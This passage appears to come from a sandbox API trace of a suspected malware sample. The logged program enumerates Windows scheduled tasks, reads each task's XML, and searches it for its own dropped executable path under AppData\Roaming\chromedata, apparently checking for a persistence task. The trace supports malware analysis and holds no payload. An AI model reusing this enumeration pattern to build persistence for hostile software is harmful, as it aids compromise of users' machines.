	[0073.225] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrScheduleTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-135)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-136)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrSchedule</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{CEF51277-5358-477b-858C-4E14F0C80BF7}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.226] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.226] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x11, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.226] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="RecordingRestart") returned 0x0
	[0073.226] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RecordingRestart</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-127)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-128)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehrec</Command>\r\n      <Arguments>/RestartRecording</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.234] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RecordingRestart</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-127)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-128)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehrec</Command>\r\n      <Arguments>/RestartRecording</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.235] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.235] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x12, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.235] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="RegisterSearch") returned 0x0
	[0073.235] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RegisterSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRegisterSearch $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.236] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RegisterSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRegisterSearch $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.237] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.237] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x13, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.237] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="ReindexSearchRoot") returned 0x0
	[0073.237] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ReindexSearchRoot</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoReindexSearchRoot</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.239] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ReindexSearchRoot</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoReindexSearchRoot</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.239] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.239] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x14, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.239] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="SqlLiteRecoveryTask") returned 0x0
	[0073.239] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-133)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-134)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-SqlLiteRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{59116E30-02BD-4b84-BA1E-5D77E809B1A2}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.241] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-133)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-134)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-SqlLiteRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{59116E30-02BD-4b84-BA1E-5D77E809B1A2}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.241] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.242] IRegisteredTaskCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x15, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff40) returned 0x0
	[0073.242] IRegisteredTask:get_Name (in: This=0x55ff40, pName=0x128e3c | out: pName=0x128e3c*="UpdateRecordPath") returned 0x0
	[0073.242] IRegisteredTask:get_Xml (in: This=0x55ff40, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\UpdateRecordPath</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoUpdateRecordPath $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.244] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\UpdateRecordPath</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoUpdateRecordPath $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.244] IUnknown:Release (This=0x55ff40) returned 0x0
	[0073.244] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.244] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe58) returned 0x0
	[0073.245] ITaskFolderCollection:get_Count (in: This=0x55fe58, pCount=0x128e2c | out: pCount=0x128e2c*=1) returned 0x0
	[0073.245] ITaskFolderCollection:get_Item (in: This=0x55fe58, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x128e54 | out: ppFolder=0x128e54*=0x55ff48) returned 0x0
	[0073.245] ITaskFolder:GetTasks (in: This=0x55ff48, flags=1, ppTasks=0x128d28 | out: ppTasks=0x128d28*=0x22c0048) returned 0x0
	[0073.245] IRegisteredTaskCollection:get_Count (in: This=0x22c0048, pCount=0x128d18 | out: pCount=0x128d18*=0) returned 0x0
	[0073.246] IUnknown:Release (This=0x22c0048) returned 0x0
	[0073.246] ITaskFolder:GetFolders (in: This=0x55ff48, flags=0, ppFolders=0x128d1c | out: ppFolders=0x128d1c*=0x22c0048) returned 0x0
	[0073.246] ITaskFolderCollection:get_Count (in: This=0x22c0048, pCount=0x128d14 | out: pCount=0x128d14*=0) returned 0x0
	[0073.246] IUnknown:Release (This=0x22c0048) returned 0x0
	[0073.246] TaskScheduler:IUnknown:Release (This=0x55ff48) returned 0x0
	[0073.246] IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.246] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.246] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xe, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.246] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe60) returned 0x0
	[0073.247] IRegisteredTaskCollection:get_Count (in: This=0x55fe60, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.247] IRegisteredTaskCollection:get_Item (in: This=0x55fe60, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff58) returned 0x0
	[0073.247] IRegisteredTask:get_Name (in: This=0x55ff58, pName=0x128e3c | out: pName=0x128e3c*="CorruptionDetector") returned 0x0
	[0073.247] IRegisteredTask:get_Xml (in: This=0x55ff58, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <EventTrigger id=\"9ab90857-0ac9-49d3-845f-c235144fb537\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Application Popup'] and EventID=1801]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Group\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Group\">\r\n    <ComHandler>\r\n      <ClassId>{190BA3F6-0205-4f46-B589-95C6822899D2}</ClassId>\r\n      <Data><![CDATA[PageNotZero]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.249] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  <Triggers>\r\n    <EventTrigger id=\"9ab90857-0ac9-49d3-845f-c235144fb537\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" 